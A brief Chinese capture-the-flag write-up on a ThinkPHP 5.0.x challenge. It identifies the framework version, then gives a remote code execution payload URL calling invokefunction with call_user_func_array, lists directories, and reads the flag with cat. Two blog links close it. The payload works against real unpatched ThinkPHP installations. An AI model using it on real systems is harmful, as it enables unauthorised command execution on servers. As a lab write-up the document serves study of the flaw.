进入链接:
thinkphp v5是一个php框架,在github 上搜索,得到如下版本
随便选一个输入到url中,连接返回:
说明版本是5.0.2,根据5.0.21版本构造payload,得到如下
/?s=index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=id
继续,ls查看目录,无异常
继续,访问上级目录,在第三层发现flag的身影:
用cat访问flag
https://blog.csdn.net/phpergod/article/details/92841998
https://blog.csdn.net/Mr_helloword/article/details/107924218